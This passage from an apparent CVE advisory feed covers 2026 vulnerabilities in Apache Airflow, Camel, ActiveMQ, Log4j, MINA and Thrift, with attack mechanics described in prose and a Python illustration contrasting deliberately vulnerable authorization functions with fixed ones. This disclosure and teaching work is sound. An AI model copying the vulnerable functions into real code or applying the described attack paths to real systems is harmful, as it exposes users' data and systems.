vulnerability. - Implement and deploy a Core interceptor to deny all Core downstream federation connect packets. Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at  https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html .

Products Affected

Vendor Product Version
apache activemq_artemis *
apache artemis 2.50.0
CVE-2026-28563

Apache Airflow versions 3.1.0 through 3.1.7 /ui/dependencies endpoint returns the full DAG dependency graph without filtering by authorized DAG IDs. This allows an authenticated user with only DAG Dependencies permission to enumerate DAGs they are not authorized to view. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.
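
This endpoint and the DagVersion listing under CVE-2026-26929 fail the same way: a per-DAG check that runs for one named DAG is skipped for the "give me everything" form (the `~` wildcard, or a graph endpoint with no DAG parameter), so the listing is built from all DAGs instead of the caller's authorized subset. The Python below is an added illustration of the filtering a list endpoint needs, not Airflow's API code; the DAG catalogue, dependency edges, users and permission sets are constructed.

```python
# Constructed catalogue: dag_id -> version numbers, and upstream -> downstream edges.
DAG_VERSIONS = {"etl_public": [1, 2], "payroll": [1], "hr_sync": [1, 2, 3]}
DEPENDENCIES = [("etl_public", "payroll"), ("payroll", "hr_sync")]

# Constructed per-user DAG read permissions.
USER_DAG_ACCESS = {
    "analyst": {"etl_public"},
    "hr_admin": {"hr_sync", "payroll"},
}

WILDCARD = "~"


class Forbidden(Exception):
    """Caller is not authorized for the named DAG."""


def authorized_dags(user: str) -> set:
    return USER_DAG_ACCESS.get(user, set())


def list_dag_versions_vulnerable(user: str, dag_id: str) -> dict:
    """Pre-fix shape: a concrete dag_id is checked, the wildcard is not."""
    if dag_id == WILDCARD:
        return dict(DAG_VERSIONS)
    if dag_id not in authorized_dags(user):
        raise Forbidden(dag_id)
    return {dag_id: DAG_VERSIONS[dag_id]}


def list_dag_versions_fixed(user: str, dag_id: str) -> dict:
    """Fixed shape: the wildcard expands to the caller's authorized DAGs,
    a concrete dag_id still gets the explicit check."""
    allowed = authorized_dags(user)
    if dag_id == WILDCARD:
        return {d: v for d, v in DAG_VERSIONS.items() if d in allowed}
    if dag_id not in allowed:
        raise Forbidden(dag_id)
    return {dag_id: DAG_VERSIONS[dag_id]}


def dependency_graph_vulnerable(user: str) -> list:
    """Pre-fix shape: the whole graph, whoever asks."""
    return list(DEPENDENCIES)


def dependency_graph_fixed(user: str) -> list:
    """Fixed shape: only edges whose both endpoints the caller may read. An
    unauthorized DAG must not appear even as a node name, since the name
    itself is what the enumeration attack is after."""
    allowed = authorized_dags(user)
    return [(a, b) for a, b in DEPENDENCIES if a in allowed and b in allowed]


def is_forbidden(fn, *args) -> bool:
    """Helper: True if fn(*args) raises Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The design point is to route every listing through the same `allowed` set rather than adding a second, special-cased check for the wildcard; that way a future "all" form (an empty filter, a glob, a new endpoint) inherits the filtering instead of re-introducing the bug.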

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-28779

In Apache Airflow versions 3.1.0 through 3.1.7, the session token (_token) cookie is set with path=/ regardless of the configured [webserver] base_url or [api] base_url. This allows any application co-hosted under the same domain to capture valid Airflow session tokens from HTTP request headers, allowing full session takeover without attacking Airflow itself. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-30911

Apache Airflow versions 3.1.0 through 3.1.7 contain a missing authorization vulnerability in the Execution API's Human-in-the-Loop (HITL) endpoints that allows any authenticated task instance to read, approve, or reject HITL workflows belonging to any other task instance. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-32642

Incorrect Authorization (CWE-863) vulnerability in Apache Artemis, Apache ActiveMQ Artemis exists when an application using the OpenWire protocol attempts to create a non-durable JMS topic subscription on an address that doesn't exist with an authenticated user which has the "createDurableQueue" permission but does not have the "createAddress" permission and address auto-creation is disabled. In this circumstance, a temporary address will be created whereas the attempt to create the non-durable subscription should instead fail since the user is not authorized to create the corresponding address. When the OpenWire connection is closed the address is removed. This issue affects Apache Artemis: from 2.50.0 through 2.52.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.53.0, which fixes the issue.

Products Affected

Vendor Product Version
apache artemis *
apache activemq_artemis *
CVE-2026-32794

Improper Certificate Validation vulnerability in Apache Airflow Provider for Databricks. Provider code did not validate certificates for connections to the Databricks back-end, which could result in a man-in-the-middle attack in which traffic is intercepted and manipulated or credentials are exfiltrated without notice. This issue affects Apache Airflow Provider for Databricks: from 1.10.0 before 1.12.0. Users are recommended to upgrade to version 1.12.0, which fixes the issue.

Products Affected

Vendor Product Version
apache airflow_providers_databricks *
CVE-2026-33453

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec). The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy.

Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration.

Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
apache camel 4.18.0
CVE-2026-33454

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from("imap://...") or from("pop3://...")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.4 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L 3.9 5.5

Products Affected

Vendor Product Version
apache camel *
CVE-2026-34478

Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly: * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output. * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-34480

Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-34481

Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-38743

The authenticated /ui/dags endpoint did not enforce per-DAG access control on embedded Human-in-the-Loop (HITL) and TaskInstance records: a logged-in Airflow user with read access to at least one DAG could retrieve HITL prompts (including their request parameters) and full TaskInstance details for DAGs outside their authorized scope. Because HITL prompts and TaskInstance fields routinely carry operator parameters and free-form context attached to a task, the leak widens visibility of DAG-run data beyond the intended per-DAG RBAC boundary for every authenticated user. Users are recommended to upgrade to version 3.2.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-40022

When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the BasicAuthenticationConfigurer and JWTAuthenticationConfigurer classes derive the authentication path from properties.getPath() when camel.server.authenticationPath / camel.management.authenticationPath is not explicitly set. Combined with the Vert.x sub-router mounting model - the sub-router is mounted at _path_* and the authentication handler is registered inside the sub-router at the resolved path - this causes the authentication handler to match only the exact configured context path, not its subpaths. Unauthenticated requests to subpaths such as /api/_route_ or /admin/observe/info therefore reach protected business routes and management endpoints without being challenged for credentials. The /observe/info endpoint can disclose runtime metadata such as the user, working directory, home directory, process ID, JVM and operating system information. This issue affects Apache Camel: from 4.14.1 before 4.14.6, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, they are suggested to upgrade to 4.14.6. If users are on the 4.18.x LTS releases stream, they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

Products Affected

Vendor Product Version
apache camel *
CVE-2026-40048

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application — for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack — can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40453

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40466

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. An authenticated attacker may bypass the fix in CVE-2026-34197 by adding a connector using an HTTP Discovery transport via BrokerView.addNetworkConnector or BrokerView.addConnector through Jolokia if the activemq-http module is on the classpath. A malicious HTTP endpoint can return a VM transport through the HTTP URI which will bypass the validation added in CVE-2026-34197. The attacker can then use the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ All: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 5.19.6 or 6.2.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
apache activemq_broker *
CVE-2026-40473

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40690

The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope. Users are recommended to upgrade to version 3.2.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-40858

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. The JIRA ticket: https://issues.apache.org/jira/browse/CAMEL-23322 refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40860

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-41043

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. An authenticated attacker can show malicious content when browsing queues in the web console by overriding the content type to be HTML (instead of XML) and by injecting HTML into a JMS selector field. This issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Web: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache activemq *
apache activemq_web *
CVE-2026-41044

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ, Apache ActiveMQ Broker, Apache ActiveMQ All. An authenticated attacker can use the admin web console page to construct a malicious broker name that bypasses name validation to include an xbean binding that can be later used by a VM transport to load a remote Spring XML application. The attacker can then use the DestinationView mbean to send a message to trigger a VM transport creation that will reference this malicious broker name which can lead to loading the malicious Spring XML context file. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Broker: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ All: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
apache activemq_broker *
CVE-2026-41081

Improper Handling of TLS Client Authentication Failure Leading to Anonymous Principal Assignment in Apache Storm

Versions Affected: up to 2.8.7

Description: When TLS transport is enabled in Apache Storm without requiring client certificate authentication (the default configuration), the TlsTransportPlugin assigns a fallback principal (CN=ANONYMOUS) if no client certificate is presented or if certificate verification fails. The underlying SSLPeerUnverifiedException is caught and suppressed rather than rejecting the connection. This fail-open behavior means an unauthenticated client can establish a TLS connection and receive a valid principal identity. If the configured authorizer (e.g., SimpleACLAuthorizer) does not explicitly deny access to CN=ANONYMOUS, this may result in unauthorized access to Storm services. The condition is logged at debug level only, reducing visibility in production.

Impact: Unauthenticated clients may be assigned a principal identity, potentially bypassing authorization in permissive or misconfigured environments.

Mitigation: Users should upgrade to 2.8.7 in which TLS authentication failures are handled in a fail-closed manner. Users who cannot upgrade immediately should:
- Enable mandatory client certificate authentication (nimbus.thrift.tls.client.auth.required: true)
- Ensure authorization rules explicitly deny access to CN=ANONYMOUS
- Review all ACL configurations for implicit default-allow behavior

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache storm *
CVE-2026-41409

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late, after a static initializer in a class to be read might already have been executed. Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2026-41602

Integer Overflow or Wraparound vulnerability in the Apache Thrift TFramedTransport Go language implementation. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41603

Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41604

Out-of-bounds Read vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41605

Integer Overflow or Wraparound vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41606

Uncontrolled Recursion vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41607

Out-of-bounds Read vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L 3.9 2.5

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41635

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed. The fix checks if the class is present in the accepted class filter before calling Class.forName(). Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2026-41636

Uncontrolled Recursion vulnerability in Apache Thrift Node.js bindings. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41873

